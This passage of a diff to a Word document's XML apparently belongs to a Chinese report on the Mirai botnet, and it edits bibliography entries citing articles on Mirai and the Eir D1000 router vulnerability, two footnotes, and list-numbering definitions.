+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">, </w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>“蜜罐揭秘真实的</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>Mirai</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>僵尸网络</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>,</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>”</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t xml:space="preserve"> 9 1 2017. [</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>联机</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>]. Available: http://www.freebuf.com/articles/terminal/124717.html.</w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+              </w:tr>
+              <w:tr>
+                <w:trPr>
+                  <w:divId w:val="935603005"/>
+                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
+                </w:trPr>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="50" w:type="pct"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="a9"/>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">[15] </w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="0" w:type="auto"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="a9"/>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">lennarthaagsma, </w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>“</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>Recent vulnerability in Eir D1000 Router used to spread updated version of Mirai DDoS bot,</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>”</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t xml:space="preserve"> 28 11 2016. [</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>联机</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>]. Available: https://blog.fox-it.com/2016/11/28/recent-vulnerability-in-eir-d1000-router-used-to-spread-updated-version-of-mirai-ddos-bot/.</w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+              </w:tr>
+              <w:tr>
+                <w:trPr>
+                  <w:divId w:val="935603005"/>
+                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
+                </w:trPr>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="50" w:type="pct"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="a9"/>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">[16] </w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="0" w:type="auto"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="a9"/>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">Kenzo, </w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>“</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>Eir</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>’</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>s D1000 Modem Is Wide Open To Being Hacked,</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>”</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t xml:space="preserve"> 7 11 2016. [</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>联机</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t>]. Available: https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/.</w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+              </w:tr>
+              <w:tr>
+                <w:trPr>
+                  <w:divId w:val="935603005"/>
+                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
+                </w:trPr>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="50" w:type="pct"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="a9"/>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
+                        <w:noProof/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">[17] </w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="0" w:type="auto"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="a9"/>
+                      <w:rPr>
+                        <w:rFonts w:hint="eastAsia"/>
                         <w:noProof/>
                       </w:rPr>
                     </w:pPr>
@@ -10981,7 +12895,7 @@
             </w:tbl>
             <w:p>
               <w:pPr>
-                <w:divId w:val="2057923878"/>
+                <w:divId w:val="935603005"/>
                 <w:rPr>
                   <w:rFonts w:eastAsia="Times New Roman"/>
                   <w:noProof/>
@@ -11170,14 +13084,7 @@
           <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
           <w:kern w:val="0"/>
         </w:rPr>
-        <w:t>Eir为</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:kern w:val="0"/>
-        </w:rPr>
-        <w:t>爱尔兰最大的ISP提供商</w:t>
+        <w:t>Eir为爱尔兰最大的ISP提供商</w:t>
       </w:r>
     </w:p>
   </w:footnote>
@@ -11265,13 +13172,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>可能</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>是用于端口探测</w:t>
+        <w:t>可能是用于端口探测</w:t>
       </w:r>
     </w:p>
   </w:footnote>
@@ -11507,6 +13408,92 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="19A2145E"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="00864F30"/>
+    <w:lvl w:ilvl="0" w:tplc="0409000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="420" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1CA51BDF"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="C2282E9E"/>
@@ -11593,7 +13580,120 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="1FEA0DD4"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="5058D758"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="420" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="23146F80"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="82AED526"/>
@@ -11706,7 +13806,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="23470504"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="802EFFBE"/>
@@ -11792,7 +13892,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2B076832"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="425AD11C"/>
@@ -11878,7 +13978,93 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="2F2E3553"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="8C5E9330"/>
+    <w:lvl w:ilvl="0" w:tplc="0409000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="420" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3C610A2C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="D4BE3626"/>
@@ -11991,7 +14177,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3DBE540F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="31923938"/>
@@ -12104,7 +14290,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3DF1014E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="7F1A7970"/>
@@ -12217,7 +14403,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="404B2C7A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="0EDAFC94"/>
@@ -12330,7 +14516,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4C1A4CED"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="B17A0FD2"/>
@@ -12443,7 +14629,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="56CE5F74"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="811ECA68"/>
@@ -12592,7 +14778,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5E204F27"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="C2D28552"/>
@@ -12705,7 +14891,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="65BC3132"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="0622C1DE"/>
@@ -12818,7 +15004,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6A7B4A04"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="72E2AFCE"/>
@@ -12967,7 +15153,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="709E34B2"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7C2654AA"/>
@@ -13116,7 +15302,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="73B666A8"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="EA22BB38"/>
@@ -13265,7 +15451,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="790D2F4C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="5A3E6ADA"/>
@@ -13378,7 +15564,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7A2F2F41"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="19E84A5C"/>
@@ -13491,7 +15677,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7C203183"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="63FAC574"/>
@@ -13605,64 +15791,73 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
-    <w:abstractNumId w:val="7"/>
+    <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="2">
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="3">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="19"/>
   </w:num>
   <w:num w:numId="4">
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="5">
+    <w:abstractNumId w:val="21"/>
+  </w:num>
+  <w:num w:numId="6">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="7">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="8">
+    <w:abstractNumId w:val="13"/>
+  </w:num>
+  <w:num w:numId="9">
+    <w:abstractNumId w:val="12"/>
+  </w:num>
+  <w:num w:numId="10">
     <w:abstractNumId w:val="6"/>
   </w:num>
-  <w:num w:numId="5">
+  <w:num w:numId="11">
+    <w:abstractNumId w:val="11"/>
+  </w:num>
+  <w:num w:numId="12">
+    <w:abstractNumId w:val="15"/>
+  </w:num>
+  <w:num w:numId="13">
     <w:abstractNumId w:val="18"/>
   </w:num>
-  <w:num w:numId="6">
-    <w:abstractNumId w:val="2"/>
-  </w:num>
-  <w:num w:numId="7">
+  <w:num w:numId="14">
     <w:abstractNumId w:val="5"/>
   </w:num>
-  <w:num w:numId="8">
-    <w:abstractNumId w:val="10"/>
-  </w:num>
-  <w:num w:numId="9">
-    <w:abstractNumId w:val="9"/>
-  </w:num>
-  <w:num w:numId="10">
-    <w:abstractNumId w:val="4"/>
-  </w:num>
-  <w:num w:numId="11">
-    <w:abstractNumId w:val="8"/>
-  </w:num>
-  <w:num w:numId="12">
-    <w:abstractNumId w:val="12"/>
-  </w:num>
-  <w:num w:numId="13">
-    <w:abstractNumId w:val="15"/>
-  </w:num>
-  <w:num w:numId="14">
-    <w:abstractNumId w:val="3"/>
-  </w:num>
   <w:num w:numId="15">
-    <w:abstractNumId w:val="19"/>
+    <w:abstractNumId w:val="22"/>
   </w:num>
   <w:num w:numId="16">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="14"/>
   </w:num>
   <w:num w:numId="17">
     <w:abstractNumId w:val="0"/>
   </w:num>
